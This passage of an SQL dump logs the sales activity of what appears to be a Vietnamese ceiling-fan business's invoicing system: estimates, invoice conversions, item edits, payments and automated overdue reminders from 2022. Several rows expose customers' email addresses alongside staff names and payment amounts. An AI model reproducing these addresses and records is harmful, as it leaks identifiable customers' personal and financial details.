(987, 'invoice', 176, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-05 15:46:36'),
(988, 'invoice', 176, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"111.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/181\" target=\"_blank\">#181</a>\";}', '1', 'Ho Gia Phat', '2022-09-05 15:46:36'),
(989, 'estimate', 95, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-09-05 16:09:55'),
(990, 'estimate', 96, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-09-06 09:47:59'),
(991, 'estimate', 97, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-09-06 10:39:14'),
(992, 'estimate', 96, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:21:\"Haiku L 52 inch White\";}', '6', 'Mỹ Anh Nguyễn', '2022-09-06 14:27:34'),
(993, 'estimate', 96, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:21:\"Haiku L 44 inch White\";}', '6', 'Mỹ Anh Nguyễn', '2022-09-06 14:27:34'),
(994, 'estimate', 96, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:21:\"Haiku L 44 inch White\";}', '1', 'Ho Gia Phat', '2022-09-06 14:30:41'),
(995, 'estimate', 96, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:28:\"Bộ đèn LED quạt trần\";}', '1', 'Ho Gia Phat', '2022-09-06 14:30:41'),
(996, 'estimate', 96, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-09-06 14:30:41'),
(997, 'estimate', 96, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:21:\"Haiku L 44 inch White\";}', '1', 'Ho Gia Phat', '2022-09-06 14:31:03'),
(998, 'invoice', 177, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-06 14:31:20'),
(999, 'estimate', 96, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/177\">INV-171-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-06 14:31:20'),
(1000, 'invoice', 177, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-09-06 14:49:20'),
(1001, 'invoice', 178, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-09-06 16:46:59'),
(1002, 'estimate', 97, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/178\">INV-172-22</a>\";}', NULL, '', '2022-09-06 16:46:59'),
(1003, 'invoice', 178, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-09-06 18:09:46'),
(1004, 'invoice', 178, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"31.450.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/182\" target=\"_blank\">#182</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-09-06 18:09:46'),
(1005, 'estimate', 98, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-08 14:32:34'),
(1006, 'estimate', 98, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-08 14:33:26'),
(1007, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-10 16:59:35'),
(1008, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-10 16:59:40'),
(1009, 'invoice', 144, 'user_sent_overdue_reminder', 'a:2:{i:0;s:49:\"<custom_data>hien.vo@alliancevn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-10 16:59:47'),
(1010, 'invoice', 145, 'user_sent_overdue_reminder', 'a:2:{i:0;s:42:\"<custom_data>info@savimec.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-10 16:59:53'),
(1011, 'invoice', 150, 'user_sent_overdue_reminder', 'a:2:{i:0;s:42:\"<custom_data>nga.do@mepac.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-10 16:59:58'),
(1012, 'estimate', 99, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-12 10:21:12'),
(1013, 'invoice', 179, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-12 10:21:20'),
(1014, 'estimate', 99, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/179\">INV-173-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-12 10:21:20'),
(1015, 'estimate', 100, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-12 10:25:23'),
(1016, 'invoice', 180, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-12 10:25:28'),
(1017, 'estimate', 100, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/180\">INV-174-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-12 10:25:28'),
(1018, 'invoice', 108, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-12 10:55:44'),
(1019, 'invoice', 108, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"15.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/183\" target=\"_blank\">#183</a>\";}', '1', 'Ho Gia Phat', '2022-09-12 10:55:44'),
(1020, 'invoice', 172, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-12 10:56:05'),
(1021, 'invoice', 172, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"39.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/184\" target=\"_blank\">#184</a>\";}', '1', 'Ho Gia Phat', '2022-09-12 10:56:05'),
(1022, 'invoice', 181, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-13 08:50:56'),
(1023, 'estimate', 95, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/181\">INV-175-22</a>\";}', NULL, '', '2022-09-13 08:50:56'),
(1024, 'estimate', 99, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:35:\"Quạt trần KATRINA 52 Gray Maple\";}', '1', 'Ho Gia Phat', '2022-09-13 09:39:53'),
(1025, 'estimate', 99, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:32:\"Quạt trần HAMACHI 52 LED KOA\";}', '1', 'Ho Gia Phat', '2022-09-13 09:39:53'),
(1026, 'invoice', 179, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:35:\"Quạt trần KATRINA 52 Gray Maple\";}', '1', 'Ho Gia Phat', '2022-09-13 10:09:53'),
(1027, 'invoice', 179, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:32:\"Quạt trần HAMACHI 52 LED KOA\";}', '1', 'Ho Gia Phat', '2022-09-13 10:09:53'),
(1028, 'invoice', 179, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-14 09:49:25'),
(1029, 'invoice', 179, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.040.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/185\" target=\"_blank\">#185</a>\";}', '1', 'Ho Gia Phat', '2022-09-14 09:49:25'),
(1030, 'estimate', 101, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-14 16:11:48'),
(1031, 'estimate', 101, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-14 16:11:58'),
(1032, 'invoice', 182, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-14 16:12:50'),
(1033, 'estimate', 101, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/182\">INV-176-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-14 16:12:50'),
(1034, 'invoice', 182, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-14 16:44:06'),
(1035, 'invoice', 182, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.387.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/186\" target=\"_blank\">#186</a>\";}', '1', 'Ho Gia Phat', '2022-09-14 16:44:06'),
(1036, 'invoice', 131, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:192:\"Sải cánh 152cm \r\nMàu sắc thân quạt: Trắng\r\nMàu cánh: Gỗ tự nhiên màu sáng\r\nĐộng cơ : 38W, BLDC tiết kiệm điện DC motor\r\nĐiều khiển 5 tốc độ kèm theo\r\n\";}', '1', 'Ho Gia Phat', '2022-09-14 17:03:58'),
(1037, 'invoice', 181, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-14 17:35:15'),
(1038, 'invoice', 181, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.050.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/187\" target=\"_blank\">#187</a>\";}', '1', 'Ho Gia Phat', '2022-09-14 17:35:15'),
(1039, 'invoice', 183, 'invoice_activity_created', '', '6', 'Kế Toán Bán Hàng', '2022-09-14 17:37:21'),
(1040, 'estimate', 102, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-15 11:36:10'),
(1041, 'estimate', 103, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-15 15:31:19'),
(1042, 'invoice', 184, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-15 15:31:29'),
(1043, 'estimate', 103, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/184\">INV-178-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-15 15:31:29'),
(1044, 'invoice', 184, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-15 16:03:00'),
(1045, 'invoice', 184, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/188\" target=\"_blank\">#188</a>\";}', '1', 'Ho Gia Phat', '2022-09-15 16:03:00');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(1046, 'invoice', 184, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-15 20:08:14'),
(1047, 'invoice', 184, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/189\" target=\"_blank\">#189</a>\";}', '1', 'Ho Gia Phat', '2022-09-15 20:08:14'),
(1048, 'invoice', 185, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-19 11:29:30'),
(1049, 'estimate', 104, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-19 16:47:01'),
(1050, 'estimate', 96, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-19 16:47:33'),
(1051, 'estimate', 105, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-20 12:35:10'),
(1052, 'estimate', 105, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:461:\"Sải cánh 132cm ( ~ 52inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nĐèn LED: 3 màu, 2700K - 3000K <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm <br />\r\n\";i:1;s:416:\"Sải cánh 132cm ( ~ 52inch) \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng) \r\nMàu cánh: Gỗ sáng (Maple Wood) \r\nĐèn LED: 3 màu, 2700K - 3000K \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '1', 'Ho Gia Phat', '2022-09-20 12:35:21'),
(1053, 'estimate', 106, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-20 13:29:26'),
(1054, 'estimate', 106, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-20 13:57:30'),
(1055, 'estimate', 105, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-20 14:08:30'),
(1056, 'invoice', 186, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-20 15:27:34'),
(1057, 'estimate', 105, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/186\">INV-180-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-20 15:27:34'),
(1058, 'invoice', 101, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-09-21 11:56:12'),
(1059, 'invoice', 187, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-21 11:58:52'),
(1060, 'estimate', 106, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/187\">INV-182-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-21 11:58:52'),
(1061, 'invoice', 188, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-23 09:30:48'),
(1062, 'invoice', 161, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2022-09-23 11:53:47'),
(1063, 'invoice', 131, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>khongco1@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-23 11:53:55'),
(1064, 'invoice', 135, 'user_sent_overdue_reminder', 'a:2:{i:0;s:45:\"<custom_data>omanizen@gmail.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-23 11:54:01'),
(1065, 'invoice', 144, 'user_sent_overdue_reminder', 'a:2:{i:0;s:49:\"<custom_data>hien.vo@alliancevn.com</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-23 11:54:07'),
(1066, 'invoice', 145, 'user_sent_overdue_reminder', 'a:2:{i:0;s:42:\"<custom_data>info@savimec.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-23 11:54:13'),
(1067, 'invoice', 150, 'user_sent_overdue_reminder', 'a:2:{i:0;s:42:\"<custom_data>nga.do@mepac.vn</custom_data>\";i:1;s:1:\" \";}', '[CRON]', '[CRON]', '2022-09-23 11:54:21'),
(1068, 'estimate', 98, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2022-09-23 11:54:21'),
(1069, 'estimate', 107, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-09-23 15:43:19'),
(1070, 'invoice', 189, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-23 15:43:27'),
(1071, 'estimate', 107, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/189\">INV-183-22</a>\";}', '1', 'Ho Gia Phat', '2022-09-23 15:43:27'),
(1072, 'invoice', 189, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:165:\"Module LED Haiku L series<br />\r\nÁnh sáng màu vàng ấm: 2700K<br />\r\nĐiều chỉnh 16 cấp độ sáng (theo dãi tầng màu)<br />\r\nChế độ bật/tắt\";i:1;s:152:\"Module LED Haiku L series\r\nÁnh sáng màu vàng ấm: 2700K\r\nĐiều chỉnh 16 cấp độ sáng (theo dãi tần màu sáng)\r\nChế độ bật/tắt\";}', '1', 'Ho Gia Phat', '2022-09-23 15:44:54'),
(1073, 'invoice', 190, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-09-27 14:07:20'),
(1074, 'invoice', 183, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-27 14:34:18'),
(1075, 'invoice', 183, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/190\" target=\"_blank\">#190</a>\";}', '1', 'Ho Gia Phat', '2022-09-27 14:34:18'),
(1076, 'invoice', 173, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-27 14:34:34'),
(1077, 'invoice', 173, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"16.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/191\" target=\"_blank\">#191</a>\";}', '1', 'Ho Gia Phat', '2022-09-27 14:34:34'),
(1078, 'estimate', 98, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>5</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-27 14:35:01'),
(1079, 'invoice', 185, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-27 14:35:53'),
(1080, 'invoice', 185, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/192\" target=\"_blank\">#192</a>\";}', '1', 'Ho Gia Phat', '2022-09-27 14:35:53'),
(1081, 'invoice', 150, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-29 13:55:26'),
(1082, 'invoice', 150, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"8.832.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/193\" target=\"_blank\">#193</a>\";}', '1', 'Ho Gia Phat', '2022-09-29 13:55:26'),
(1083, 'invoice', 150, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:15:\"nga.do@mepac.vn\";}', '1', 'Ho Gia Phat', '2022-09-29 13:55:32'),
(1084, 'invoice', 186, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-29 13:56:55'),
(1085, 'invoice', 186, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/194\" target=\"_blank\">#194</a>\";}', '1', 'Ho Gia Phat', '2022-09-29 13:56:55'),
(1086, 'invoice', 186, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-29 13:57:51'),
(1087, 'invoice', 186, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"194\";i:1;s:13:\"11.900.000 đ\";}', '1', 'Ho Gia Phat', '2022-09-29 13:57:51'),
(1088, 'invoice', 186, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-09-29 13:58:25'),
(1089, 'invoice', 186, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/195\" target=\"_blank\">#195</a>\";}', '1', 'Ho Gia Phat', '2022-09-29 13:58:25'),
(1090, 'estimate', 108, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-01 13:18:40'),
(1091, 'estimate', 108, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:321:\"Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:290:\"Sải cánh 132cm ( ~ 52inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  \r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)  \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  \r\nĐèn LED: 3 màu, 2700K - 3000K  \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '1', 'Ho Gia Phat', '2022-10-01 13:19:04'),
(1092, 'estimate', 108, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-10-01 13:19:04'),
(1093, 'invoice', 191, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-01 13:19:07'),
(1094, 'estimate', 108, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/191\">INV-185-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-01 13:19:07'),
(1095, 'estimate', 109, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-02 12:48:06'),
(1096, 'invoice', 192, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-02 12:48:13'),
(1097, 'estimate', 109, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/192\">INV-186-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-02 12:48:13'),
(1098, 'invoice', 193, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-03 16:50:31'),
(1099, 'invoice', 193, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:28:\"Bộ điều khiển quạt \";i:1;s:27:\"Bộ điều khiển quạt\";}', '1', 'Ho Gia Phat', '2022-10-04 15:45:11'),
(1100, 'invoice', 193, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:45:28'),
(1101, 'invoice', 193, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/196\" target=\"_blank\">#196</a>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:45:28'),
(1102, 'invoice', 190, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:45:57'),
(1103, 'invoice', 190, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"250.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/197\" target=\"_blank\">#197</a>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:45:57'),
(1104, 'invoice', 180, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:47:23'),
(1105, 'invoice', 180, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.450.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/198\" target=\"_blank\">#198</a>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:47:23'),
(1106, 'invoice', 187, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:48:12'),
(1107, 'invoice', 187, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/199\" target=\"_blank\">#199</a>\";}', '1', 'Ho Gia Phat', '2022-10-04 15:48:12'),
(1108, 'estimate', 110, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-05 10:47:49'),
(1109, 'estimate', 110, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '1', 'Ho Gia Phat', '2022-10-05 10:48:07'),
(1110, 'estimate', 111, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-07 09:10:42'),
(1111, 'invoice', 194, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-07 09:10:46'),
(1112, 'estimate', 111, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/194\">INV-188-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-07 09:10:47'),
(1113, 'invoice', 192, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-07 09:14:27'),
(1114, 'invoice', 192, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.540.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/200\" target=\"_blank\">#200</a>\";}', '1', 'Ho Gia Phat', '2022-10-07 09:14:27'),
(1115, 'estimate', 112, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-12 08:51:23'),
(1116, 'invoice', 195, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-12 08:51:36'),
(1117, 'estimate', 112, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/195\">INV-189-22</a>\";}', '1', 'Ho Gia Phat', '2022-10-12 08:51:36'),
(1118, 'invoice', 195, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-12 09:38:56'),
(1119, 'invoice', 195, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"46.530.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/201\" target=\"_blank\">#201</a>\";}', '1', 'Ho Gia Phat', '2022-10-12 09:38:56'),
(1120, 'invoice', 194, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-10-12 09:40:31'),
(1121, 'invoice', 194, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/202\" target=\"_blank\">#202</a>\";}', '1', 'Ho Gia Phat', '2022-10-12 09:40:31'),
(1122, 'estimate', 113, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-10-12 14:14:38'),
(1123, 'invoice', 196, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-10-12 14:15:52'),
